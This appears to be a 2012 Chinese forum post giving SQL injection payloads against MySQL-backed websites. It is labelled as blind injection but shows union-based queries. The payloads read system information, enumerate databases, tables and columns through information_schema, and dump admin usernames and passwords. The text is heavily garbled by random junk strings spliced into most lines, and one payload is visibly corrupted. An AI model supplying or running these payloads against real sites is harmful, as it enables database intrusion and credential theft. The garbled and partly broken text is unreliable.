本文介绍MYSQL盲注的一些语句和方法% d8 P5 w- V/ S# A
- I- m- K) C. s H) k
学习盲注前先了解下 IFORMATION_SCHEMA 库* a+ V5 n( ^+ J7 ?% H. T9 M, x
/ x( t3 x8 C3 O: x9 F/ P! rMysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有
- d0 t8 ?" C4 b& n9 ~存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。" L* b# b% z# v* D" E4 M" i
1.得到所有数据库名:
0 Q' u* Q' ^! R5 b; [|SCHEMATA ->存储数据库名的表, T4 y# W, ?7 x
|---字段:SCHEMA_NAME ->数据库名称
. \7 j& q8 E r' C
+ c1 `0 @- ~( m|TABLES ->存储表名& I8 b" Z' h4 ? @, I
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
: {3 {1 W8 {" S! m' |; ||---字段:TABLE_NAME ->存储表的表名( ~+ {/ a K2 ]$ g
) a; I& k# w; V1 h* O6 u! ]. H
|COLUMNS ->存储的字段名表
* B& k8 I; R) ~3 W* U|---字段:TABLE_SCHEMA ->该字段所属数据库名
\4 x6 O1 o0 X3 ~0 J|---字段:TABLE_NAME ->存储所属表的名称
3 F" c3 `# h# r" R. k6 ~0 v q
: ^1 |, c# y% t0 \( J4 D; {; {4 c|---字段:COLUMN_NAME ->该字段的名称
# B3 y: \2 \3 P1 K+ T. q0 o1 ~* M5 q( M% H }, X* u
J! Y; a$ c2 \3 ?( }7 N
G9 g; b! i. K3 E: }
###########################################################################
6 V1 ~# P5 r- y9 q
- R/ m; N5 ^; l0x001 获取系统信息:; r" b8 o l3 \
& j9 c5 C# ^1 U' o. k# Q! V- T2 F
union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*$ a( N$ K$ }/ ^9 \
1 J7 J0 a" G0 g1 [
/*" L6 E5 Y, e# \+ @8 U
6 j$ i/ U- u- }( q i@@global.version_compile_os 获取系统版本
4 A& C, R8 b7 P/ ? u, a0 U! N8 e
@@datadir 数据库路径
! \3 L& A1 N' g$ v i$ bdatabase() 当前数据库名称
2 W. l1 [9 i) x- Z L0x3c62723e 换行HEX值. Q4 w6 h( i! \- v6 t6 M1 }' A2 ~
/ ^! ?" i/ _: _. ~
*/
& @; Y! X( K5 Z9 C4 M, w* \ b
+ a& ?6 X% R' N8 o3 o
5 ]1 D+ o4 ^7 K0 U8 }& K- u2 K5 S) }( A8 S. |( I
######################################################################" z8 b1 Q V$ G4 X
( B/ D& s; ~' R! W2 C$ d+ L0x002 获取表名
$ c5 q+ W9 h5 F3 O# _1 T; T8 e& t
) {+ V; B |& |( g3 T4 Aunion select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
9 v0 F9 E w! J& H4 r7 g' w9 O9 T' _) c* K! J1 E, z
1 u0 n5 [3 e/ F; A; d% N
5 G8 |" `# C* S
/*
& r+ f- @7 Z9 F& C/ n9 ~4 i9 [" Q5 `# ~/ P7 t( q
0x67617264656e 为当前数据库名 N& S7 U5 V% I8 J8 N
4 B/ n) `+ V# \/ l; C8 ~group_concat(table_name) 使用group_concat函数 一步获得该库所有表名; q& z7 W& v; S% Y0 M1 I
+ h: Z& z, s! I2 V; x: E
*/
6 ]& }7 X n1 z! J8 _6 k
r' T' S, c/ L7 O! H######################################################################
$ S, z; f0 T, C* Q( S7 |* Q4 y. }( b9 r) M; q6 i9 p: s! z4 V
6 A/ D1 S' D% P! M' k
: ~' q! V0 q* v1 Z: E! D) v& y0x003 获取字段
% }* @( O/ ]1 _7 v0 d5 s3 X( T( ~1 u; _7 V; @" w! [" A9 Q+ n
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*. f2 H% Q( T( V) x
0 y/ o. Y+ x% K' P+ d9 ]& W
/*" _; p- Y: S' d' @7 U
4 o& {: E5 n" L x5 g
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
* b6 W, }8 M: M- F6 k& Y5 g9 h, M b4 Q- l9 R7 y
0x61646d696e ->选择一个表( n& r+ o- B$ Q2 @, m7 ~% s q' ]
' n6 [# W { }5 q1 ~% Y: r
0x67617264656e ->数据库名! y0 z( S# ~0 {! w* b+ r- Z
( S* n6 @0 t8 ? v
*/
- Y- S% c5 p; Q" V1 [& V5 C, v4 V! O- t. _6 w3 ?
#####################################################################
8 V$ S' m% z/ W% [+ [6 Z- W; y
3 }) _- E; s: ~4 S5 x4 [6 {' e
2 v/ A+ Q1 f, y$ g6 S/ ?2 G1 D2 \. w- a3 }3 N
0x004 获取数据
, p' ?( H9 G3 U; J2 r6 M9 C; \9 |6 V# Z9 C0 M" Z2 c& G
union select 1,2,3; C7 c/ a9 V" a8 P: Z. t
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
1 Q0 l* F. n) O
- U. c9 _0 Z& q# h6 Z( Tunion select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin& K3 \; \8 o+ V- S/ [( i% u# r
( q7 m0 j; G, e2 A, Z
1 f" {: ^$ P4 z, e8 T3 w7 b& x1 Y h7 L/ \
3 N! f9 g+ `7 M! K1 i/ v/*
7 A# e% k5 W& J0 L+ P: L$ Y( @% b- q% L9 z7 h8 }- M4 |
0x3c62723e 换行符号HEX编码
1 R) ^+ \/ u; X/ Y$ D
5 g# z" p1 m7 f$ t( _8 ]$ \group_concat 同时获得该字段所有数据
) g$ r6 }: M m; `; \6 A1 k( a8 w/ B" ~+ n( s% I5 O1 S+ |% _
*/! H, r/ Y# }& }8 v% f+ }
5 c0 @8 [( p# F4 X& O7 d. x I
|
发表于 2012-9-13 17:48:44
收藏
支持
反对